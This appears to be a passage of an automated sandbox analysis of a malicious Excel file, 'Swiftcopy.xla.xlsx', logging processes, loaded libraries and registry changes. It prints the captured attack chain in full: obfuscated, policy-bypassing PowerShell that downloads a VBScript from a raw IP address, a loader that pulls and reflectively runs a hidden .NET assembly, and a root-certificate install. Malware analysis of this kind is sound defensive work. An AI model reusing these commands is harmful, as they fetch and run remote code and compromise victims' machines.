      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: Swiftcopy.xla.xlsx | Virustotal: Detection: 14%
      Source: Swiftcopy.xla.xlsx | ReversingLabs: Detection: 15%
      Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"
      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'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'+[CHaR]34+'))')))"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESADA.tmp" "c:\Users\user\AppData\Local\Temp\rpgvm2d4\CSCF316C6EB41654F6E91711E8CA420E01A.TMP"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS"
      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')"
      Source: C:\Windows\System32\mshta.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: version.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: dwmapi.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: rpcrtremote.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: secur32.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: winhttp.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: webio.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: winnsi.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: nlaapi.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: oleacc.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: sxs.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: credssp.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: ncrypt.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: bcrypt.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: mpr.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: scrrun.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: msls31.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: d2d1.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: dwrite.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: dxgi.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: d3d11.dll
      Source: C:\Windows\System32\mshta.exe | Section loaded: d3d10warp.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: winbrand.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: webio.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: dwmapi.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: secur32.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: webio.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: credssp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
      Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
      Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: Swiftcopy.xla.xlsx | Static file information: File size 1158144 > 1048576
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: CallSite.Target.pdb source: powershell.exe, 0000000F.00000002.536967212.000000001C282000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Hp6pdblib.pdb source: powershell.exe, 0000000F.00000002.536967212.000000001C251000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: .pdb1 source: powershell.exe, 00000008.00000002.528831706.000000001C2FE000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: dbpdbtem.pdb source: powershell.exe, 0000000F.00000002.536967212.000000001C251000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.pdbhP source: powershell.exe, 00000008.00000002.519013010.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.pdb source: powershell.exe, 00000008.00000002.519013010.0000000002F2F000.00000004.00000800.00020000.00000000.sdmp
      Source: 73B30000.0.dr | Initial sample: OLE indicators vbamacros = False
      Source: Swiftcopy.xla.xlsx | Initial sample: OLE indicators encrypted = True

      Data Obfuscation

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')"
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'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'+[CHaR]34+'))')))"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE8999022D push eax; iretd 8_2_000007FE89990241
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899900BD pushad ; iretd 8_2_000007FE899900C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_000007FE89A91F15 push ss; retf 001Ah 15_2_000007FE89A91F3A

      Persistence and Installation Behavior

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.dll
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
